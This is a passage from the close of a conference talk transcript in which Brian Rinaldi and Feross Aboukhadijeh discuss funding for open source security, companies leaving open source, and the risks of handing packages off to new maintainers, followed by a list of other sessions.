toward it could help too. There’s been talk of that, you know, seeing it more as a critical infrastructure for the nation, you know, and I’ve seen the EU put money toward this, and there’s interest now from the White House around open source security of critical projects. There’s been money going toward that from the Linux Foundation, open SSF. There’s these different organizations that are trying to funnel money to critical projects, identify critical projects, and then give them resources and stuff like that. So things are improving, but, but, yeah, not enough. And, you know, not, not as far as needs to go, I would say,

Brian Rinaldi 57:13 yeah, yeah. It definitely is a complicated issue. And, you know, I’ve seen it even, I mean, even even to the point where, if you currently, you see a lot of companies even jumping out of open source because of of a lot of the complications and things like that. So, you know, which is a shame, right?

Feross Aboukhadijeh 57:33 Right? You’re talking about, like, the the companies that don’t want their don’t want the cloud providers, like Amazon, Yeah,

Brian Rinaldi 57:40 everybody’s Yeah, being able to, like, yeah, have have some other company take their service and just be like, Oh, hey, we’re gonna sell it now. Yeah, right. So, you know, there’s a, I think there’s, there’s so many different we can have a whole other talk about issues around open source, not just, yeah, security vulnerabilities, but yeah,

Feross Aboukhadijeh 57:58 yeah. I mean, I think maintainers are just doing a ton of work, and it’s like, it’s such a thing job, and it’s one of these things where I don’t know we need to maybe, maybe part of it is we just need a better way to, like, hand off projects to new maintainers when people inevitably, you know, just move on. You know, like some people, they just have kids, they have a family, they don’t want to do it anymore. You know, whatever life changes happen for them. They and they, we don’t really have a good way either, either you don’t pass on maintainership and the package dies, or you do, and then you take these security risks, as we’ve talked about in my talk, and it’s like, yeah, not really, not really a good situation. Yeah,

Brian Rinaldi 58:38 absolutely. Well, hopefully it gets better.

Software Engineering

More Awesome Sessions

SESSION

Getting Started With Apache Kafka for JavaScript Devs

Lucia Cerchie will show how Apache Kafka can handle and process streams of real-time data, and demonstrate how to get started using it.

SESSION

How to Open Source Your Stuff

Lean JavaScript fundamentals through hands-on, online training.

SESSION

Streamlining Serverless: Making Development Easier with Framework24

Sumit Verma will show how Framework24, a new open source project, aims to make it easy to deploy serverless infrastructure as code.

SESSION

Function Calling in Large Language Models

Xe Iaso will cut through the hype to tell you what you need to know about Large Language Models, what they are good for and how to best utilize them.

SESSION

Building a Domain Specific, GenAI Chatbot with Serverless

Moar Serverless will give you all the information you need to take advantage of serverless in your application development including new AI and edge capabilities.

Check out all 368 sessions

Feross Aboukhadijeh

Transcript

Tags

More Awesome Sessions

Getting Started With Apache Kafka for JavaScript Devs

How to Open Source Your Stuff

Streamlining Serverless: Making Development Easier with Framework24

Function Calling in Large Language Models

Building a Domain Specific, GenAI Chatbot with Serverless

Don't miss Mission: Astro Migration coming up on Aug 18